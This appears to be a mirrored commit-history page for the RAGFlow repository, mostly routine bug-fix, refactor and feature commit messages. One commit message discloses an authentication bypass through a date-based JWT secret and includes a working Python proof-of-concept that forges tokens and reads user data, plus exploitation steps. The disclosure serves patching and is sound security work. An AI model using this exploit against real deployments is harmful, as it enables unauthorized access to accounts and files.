ragflow

mirror of https://github.com/infiniflow/ragflow.git synced 2025-11-26 15:07:18 +00:00

Author	SHA1	Message	Date
Kevin Hu	96783aa82c	Fix: remove doc error. (#9413 ) ### What problem does this PR solve? Close #9407 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-08-12 15:55:04 +08:00
Stephen Hu	57b87fa9d9	Fix:TypeError: OllamaCV.chat() got an unexpected keyword argument 'stop' (#9363 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/9351 Support filter argument before invoking ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-08-12 14:55:27 +08:00
Kevin Hu	153e430b00	Feat: add meta data filter. (#9405 ) ### What problem does this PR solve? #8531 #7417 #6761 #6573 #6477 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-08-12 14:12:56 +08:00
Yongteng Lei	83771e500c	Refa: migrate chat models to LiteLLM (#9394 ) ### What problem does this PR solve? All models pass the mock response tests, which means that if a model can return the correct response, everything should work as expected. However, not all models have been fully tested in a real environment, the real API_KEY. I suggest actively monitoring the refactored models over the coming period to ensure they work correctly and fixing them step by step, or waiting to merge until most have been tested in practical environment. ### Type of change - [x] Refactoring	2025-08-12 10:59:20 +08:00
Kevin Hu	90eb5fd31b	Fix: canvas sharing bug. (#9339 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-08-08 18:31:51 +08:00
Kevin Hu	a02ca16260	Fix: add prologue to api. (#9322 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-08-08 17:05:55 +08:00
so95	392f5f4ce9	fix model type (#9250 ) ### What problem does this PR solve? ERROR type model - [x] Bug Fix (non-breaking change which fixes an issue)	2025-08-08 13:43:53 +08:00
Yongteng Lei	1bd64dafcb	Fix: update broken agent completion due to v0.20.0 changes (#9309 ) ### What problem does this PR solve? Update broken agent completion due to v0.20.0 changes. #9199 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-08-08 10:00:16 +08:00
Kevin Hu	5749aa30b0	Fix: model type error. (#9308 ) ### What problem does this PR solve? #9240 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-08-07 16:14:47 +08:00
Yongteng Lei	465f7e036a	Feat: advanced list dialogs (#9256 ) ### What problem does this PR solve? Advanced list dialogs ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-08-06 10:33:52 +08:00
Yongteng Lei	e6bad45c6d	Fix: update broken agent OpenAI-Compatible completion due to v0.20.0 changes (#9241 ) ### What problem does this PR solve? Update broken agent OpenAI-Compatible completion due to v0.20.0. #9199 Usage example: Referring the input is important, otherwise, will result in empty output. <img width="1273" height="711" alt="Image" src="https://github.com/user-attachments/assets/30740be8-f4d6-400d-9fda-d2616f89063f" /> <img width="622" height="247" alt="Image" src="https://github.com/user-attachments/assets/0a2ca57a-9600-4cec-9362-0cafd0ab3aee" /> ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-08-05 17:47:25 +08:00
Kevin Hu	6ec3f18e22	Fix: self-deployed LLM error, (#9217 ) ### What problem does this PR solve? Close #9197 Close #9145 ### Type of change - [x] Refactoring - [x] Bug fixing.	2025-08-05 09:49:47 +08:00
Yongteng Lei	52a349349d	Fix: migrate deprecated Langfuse API from v2 to v3 (#9204 ) ### What problem does this PR solve? Fix: ```bash 'Langfuse' object has no attribute 'trace' ``` ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-08-04 14:45:43 +08:00
Kevin Hu	a16cd4f110	Refa: add result to callback for agent tool use. (#9137 ) ### What problem does this PR solve? ### Type of change - [x] Refactoring	2025-08-01 21:49:39 +08:00
Yongteng Lei	cdac51f145	Fix: Redis stream lag can be nil (#9139 ) ### What problem does this PR solve? ```bash Traceback (most recent call last): File "/home/infiniflow/workspace/ragflow/api/db/services/document_service.py", line 635, in update_progress info["progress_msg"] = "%d tasks are ahead in the queue..."%get_queue_length(priority) File "/home/infiniflow/workspace/ragflow/api/db/services/document_service.py", line 686, in get_queue_length return int(group_info.get("lag", 0)) TypeError: int() argument must be a string, a bytes-like object or a real number, not 'NoneType' ``` This issue can happen very rare. When a `stream` is first created, the `lag` value may be nil, which can cause this issue. However, once any message is synced, the `lag` will become `0` afterwards. ```bash > XINFO GROUPS rag_flow_svr_queue 1) 1) "name" 2) "rag_flow_svr_task_broker" 3) "consumers" 4) (integer) 0 5) "pending" 6) (integer) 0 7) "last-delivered-id" 8) "1753952489937-0" 9) "entries-read" 10) (nil) 11) "lag" 12) (nil) ``` ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-08-01 09:39:41 +08:00
Liu An	e9c5c7bc7c	Rafe: Update LLMService type hints (#9131 ) ### What problem does this PR solve? - Add Generator return type annotation for tts method - Import typing.Generator for type hints ### Type of change - [x] Refactoring	2025-07-31 12:13:49 +08:00
Kevin Hu	d9fe279dde	Feat: Redesign and refactor agent module (#9113 ) ### What problem does this PR solve? #9082 #6365 <u> WARNING: it's not compatible with the older version of `Agent` module, which means that `Agent` from older versions can not work anymore.</u> ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-07-30 19:41:09 +08:00
Stephen Hu	5e7aaf2c41	Fix:When deleting a knowledge base that is currently performing a parsing task, the parsing queue will not be deleted! (#9018 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8995 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-07-28 17:32:12 +08:00
Stephen Hu	0fccd1fef3	Fix:in the knowledge base operation file will result in an error (#8962 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8941 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-07-25 19:26:31 +08:00
Yongteng Lei	5cc570f5e0	Refa: suppress DB migration error logs (#9043 ) ### What problem does this PR solve? Suppress DB migration error logs. ### Type of change - [x] Refactoring	2025-07-25 12:38:07 +08:00
Kevin Hu	fbd115773b	Perf: set timeout of some steps in KG. (#8873 ) ### What problem does this PR solve? ### Type of change - [x] Performance Improvement	2025-07-16 18:06:03 +08:00
Kevin Hu	f2909ea0c4	Perf: retryable mysql connection. (#8858 ) ### What problem does this PR solve? ### Type of change - [x] Performance Improvement	2025-07-15 19:05:48 +08:00
Kevin Hu	aa4a725529	Pref: use redis to check if canceled. (#8853 ) ### What problem does this PR solve? ### Type of change - [x] Performance Improvement	2025-07-15 17:19:27 +08:00
Can Wang	779932dcb0	Fix: graphrag, raptor can be null for api created kb issue (#8743 ) ### What problem does this PR solve? When knowledgebase/dataset created by API, graphrag and raptor can be null, and will trigger NoneType error when reach to this code, causing chunking task not able to finish. ![image](https://github.com/user-attachments/assets/998a63e9-611b-4301-8808-24839a05be8a) Proposed solution will result in None and pass the condition check without error. ![image](https://github.com/user-attachments/assets/184374fb-e06a-46e6-b8ac-d66a3fd93b59) ### Type of change - ✅ Bug Fix (non-breaking change which fixes an issue)	2025-07-09 17:12:42 +08:00
Yongteng Lei	c1f6e6f00e	Feat: add advanced document filter (#8723 ) ### What problem does this PR solve? Add advanced document filter ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-07-09 09:33:11 +08:00
Yongteng Lei	4d7bfd2ba3	Fix: typo process_duration (#8696 ) ### What problem does this PR solve? Fix typo process_duration. ### Type of change - [x] Documentation Update - [x] Refactoring	2025-07-07 14:11:47 +08:00
Fee He	ae3683c346	fix task_service.py (#8687 ) Fix the case where pages variable might be None ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-07-07 09:48:51 +08:00
Can Wang	83c8af1b59	Fix: page_size can be None error (#8603 ) ### What problem does this PR solve? Issue #8602 `parser_config.task_page_size` can be defaults to `None` when dataset is created by API. This was not handled by the `task_executor.py` code thus `page_size` could sometimes be `None` which will cause issue in line 351. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-07-02 18:38:48 +08:00
Stephen Hu	938d8dd878	Fix: user_default_llm configuration doesn't work for OpenAI API compatible LLM factory (#8502 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8467 when add llm the llm_name will like "llm1___OpenAI-API" `f09ca8e795/api/apps/llm_app.py (L173)` so we should not use llm1 to query ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-27 09:41:12 +08:00
Yongteng Lei	d768130204	Fix: chunk number error after re-parsing (#8513 ) ### What problem does this PR solve? Fix chunk number error after re-parsing. #8503. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-26 17:46:53 +08:00
Stephen Hu	8d9d2cc0a9	Fix: some cases Task return but not set progress (#8469 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8466 I go through the codes, current logic: When do_handle_task raises an exception, handle_task will set the progress, but for some cases do_handle_task internal will just return but not set the right progress, at this cases the redis stream will been acked but the task is running. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-25 09:58:55 +08:00
Yongteng Lei	af6850c8d8	Feat: add MCP dashboard operations (#8460 ) ### What problem does this PR solve? Add MCP server dashboard operations. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-25 09:26:04 +08:00
Song Fuchang	fd7ac17605	Feat: Scratch MCP tool calling support. (#8263 ) ### What problem does this PR solve? This is a cherry-pick from #7781 as requested. ### Type of change - [x] New Feature (non-breaking change which adds functionality) Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-23 17:45:35 +08:00
Yongteng Lei	1b022116d5	Feat: wrap search app (#8320 ) ### What problem does this PR solve? Wrap search app ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-18 16:45:42 +08:00
Jin Hai	4a2ff633e0	Fix typo in code (#8327 ) ### What problem does this PR solve? Fix typo in code ### Type of change - [x] Refactoring --------- Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-06-18 09:41:09 +08:00
Liu An	0a13d79b94	Refa: Implement centralized file name length limit using FILE_NAME_LEN_LIMIT constant (#8318 ) ### What problem does this PR solve? - Replace hardcoded 255-byte file name length checks with FILE_NAME_LEN_LIMIT constant - Update error messages to show the actual limit value - #8290 ### Type of change - [x] Refactoring Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-17 18:01:30 +08:00
Yongteng Lei	0fa1a1469e	Fix: avoid mixing different embedding models in document parsing (#8260 ) ### What problem does this PR solve? Fix mixing different embedding models in document parsing. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-16 13:40:12 +08:00
Kevin Hu	f7074037ef	Feat: Let number of task ahead be visible. (#8259 ) ### What problem does this PR solve? ![image](https://github.com/user-attachments/assets/d4ef0526-343a-426f-a85a-b05eb8b559a1) ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-13 17:32:40 +08:00
Yongteng Lei	b2eed8fed1	Fix: incorrect progress updating (#8253 ) ### What problem does this PR solve? Progress is only updated if it's valid and not regressive. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-13 17:24:14 +08:00
Stephen Hu	1ab0f52832	Fix：The OpenAI-Compatible Agent API returns an incorrect message (#8177 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8175 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 19:17:15 +08:00
Stephen Hu	6953ae89c4	Fix:when stream=false，new message without sessionid does no (#8078 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8070 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 15:14:15 +08:00
Kevin Hu	91804f28f1	Fix: issue for tavily only in a assistant. (#8076 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 13:00:43 +08:00
Gecko Security	de89b84661	Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998 ) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis Source (User Input): HTTP Authorization header containing attacker-controlled JWT token Flow Path: 1. Entry Point: `load_user()` function in `api/apps/__init__.py` (Line 142) 2. Token Processing: JWT token extracted from Authorization header 3. Secret Key Usage: Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. Database Query: `UserService.query()` called with decoded empty access_token 5. Sink: Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` Exploitation Steps: 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials Version: 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>	2025-06-05 12:10:24 +08:00
天海蒼灆	9938a4cbb6	Feat: Allow update conversation parameters and persist to database in completion (#8039 ) ### What problem does this PR solve? This PR updates the completion function to allow parameter updates when a session_id exists. It also ensures changes are saved back to the database via API4ConversationService. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-04 14:39:04 +08:00
Jin Hai	31f4d44c73	Update upload filename length limit from 128 to 256, which is aligned with os (#7971 ) ### What problem does this PR solve? Change filename length limit from 128 to 256 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-05-30 14:25:59 +08:00
Qidi Cao	f0879563d0	fix: resolve residual image files issue after document deletion (#7964 ) ### What problem does this PR solve? When deleting knowledge base documents in RAGFlow, the current process only removes the block texts in Elasticsearch and the original files in MinIO, but it leaves behind many binary images and thumbnails generated during chunking. This pull request improves the deletion process by querying the block information in Elasticsearch to ensure a more thorough and complete cleanup. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 12:56:33 +08:00
Stephen Hu	a31ad7f960	Fix: File selection in Retrieval testing causes other options to disappear (#7759 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/7753 The internal is due to when the selected row keys change will trigger a testing, but I do not know why. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 09:38:50 +08:00
Yongteng Lei	0c562f0a9f	Refa: change citation mark as [ID:n] (#7923 ) ### What problem does this PR solve? Change citation mark as [ID:n], it's easier for LLMs to follow the instruction :) #7904 ### Type of change - [x] Refactoring	2025-05-29 10:03:51 +08:00
sinopec	243ed4bc35	Feat: Surpport dynamically add knowledge basees for retrieval while u… (#7915 ) …sing the SDK chat API ### What problem does this PR solve? When using the SDK for chat, you can include the IDs of additional knowledge bases you want to use in the request. This way, you don’t need to repeatedly create new assistants to support various combinations of knowledge bases. This is especially useful when there are many knowledge bases with different content. If users clearly know which knowledge base contains the information they need and select accordingly, the recall accuracy will be greatly improved. Users only need to add an extra field, a kb_ids array, in the HTTP request. The content of this field can be determined by the client fetching the list of knowledge bases and letting the user select from it. ### Type of change - [x] New Feature (non-breaking change which adds functionality) Co-authored-by: Li Ye <liye@unittec.com>	2025-05-28 19:16:16 +08:00
liu an	ff0e82988f	Fix: patch regex vulnerability in filename handling (#7887 ) ### What problem does this PR solve? [Regular Expression Injection leading to Denial of Service (ReDoS)](https://github.com/infiniflow/ragflow/security/advisories/GHSA-wqq6-x8g9-f7mh) ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-27 16:35:37 +08:00

1 2 3 4 5 ...

415 Commits